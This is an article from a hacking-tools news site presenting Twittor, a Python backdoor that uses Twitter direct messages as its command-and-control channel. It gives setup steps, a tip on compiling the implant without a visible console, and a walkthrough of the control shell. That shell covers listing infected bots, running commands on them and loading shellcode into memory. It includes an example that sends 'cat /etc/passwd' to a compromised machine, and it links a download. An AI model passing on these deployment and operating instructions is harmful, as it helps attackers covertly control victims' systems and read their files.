Twittor - Backdoor Using Twitter For Command & Control - Darknet - Hacking Tools, Hacker News & Cyber Security

Twittor is a stealthy Python based backdoor using Twitter (Direct Messages) as a command and control server. This project has been inspired by Gcat which does the same but using a Gmail account.

Setup

For this to work you need:

A Twitter account (Use a dedicated account! Do not use your personal one!)
Register an app on Twitter with Read, write, and direct messages Access levels.

Install the dependencies:

$ pip install -r requirements.txt

1	$ pip install -r requirements.txt

This repo contains two files:

twittor.py which is the client
implant.py the actual backdoor to deploy

In both files, edit the access token part and add the ones that you previously generated:

CONSUMER_TOKEN = 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'
CONSUMER_SECRET = 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'

ACCESS_TOKEN = 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'
ACCESS_TOKEN_SECRET = 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'

USERNAME = 'XXXXXXXXXXXXXXXXXXXXXXXX'

CONSUMER_TOKEN = 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'

CONSUMER_SECRET = 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'

ACCESS_TOKEN = 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'

ACCESS_TOKEN_SECRET = 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'

USERNAME = 'XXXXXXXXXXXXXXXXXXXXXXXX'

You’re probably going to want to compile implant.py into an executable using Pyinstaller. In order to remove the console when compiling with Pyinstaller, the flags --noconsole --onefile will help. Just saying.

Usage

In order to run the client, launch the script.

$ python twittor.py

1	$ python twittor.py

You’ll then get into an ‘interactive’ shell which offers few commands that are:

$ help

    refresh - refresh C&C control
    list_bots - list active bots
    list_commands - list executed commands
    !retrieve <jobid> - retrieve jobid command
    !cmd <MAC ADDRESS> command - execute the command on the bot
    !shellcode <MAC ADDRESS> shellcode - load and execute shellcode in memory (Windows only)
    help - print this usage
    exit - exit the client

$

$ help

refresh - refresh C&C control

list_bots - list active bots

list_commands - list executed commands

!retrieve <jobid> - retrieve jobid command

!cmd <MAC ADDRESS> command - execute the command on the bot

!shellcode <MAC ADDRESS> shellcode - load and execute shellcode in memory (Windows only)

help - print this usage

exit - exit the client

Once you’ve deployed the backdoor on a couple of systems, you can check available clients using the list command:

$ list_bots
B7:76:1F:0B:50:B7: Linux-x.x.x-generic-x86_64-with-Ubuntu-14.04-precise
$

$ list_bots

B7:76:1F:0B:50:B7: Linux-x.x.x-generic-x86_64-with-Ubuntu-14.04-precise

The output is the MAC address which is used to uniquely identifies the system but also gives you OS information the implant is running on. In that case a Linux box.

Let’s issue a command to an implant:

$ !cmd B7:76:1F:0B:50:B7 cat /etc/passwd
[+] Sent command "cat /etc/passwd" with jobid: UMW07r2
$

$ !cmd B7:76:1F:0B:50:B7 cat /etc/passwd

[+] Sent command "cat /etc/passwd" with jobid: UMW07r2

Here we are telling B7:76:1F:0B:50:B7 to execute cat /etc/passwd, the script then outputs the jobid that we can use to retrieve the output of that command.

You can download Twittor here:

Twittor-master.zip

Or read more here.

Share84

Buffer

84 Shares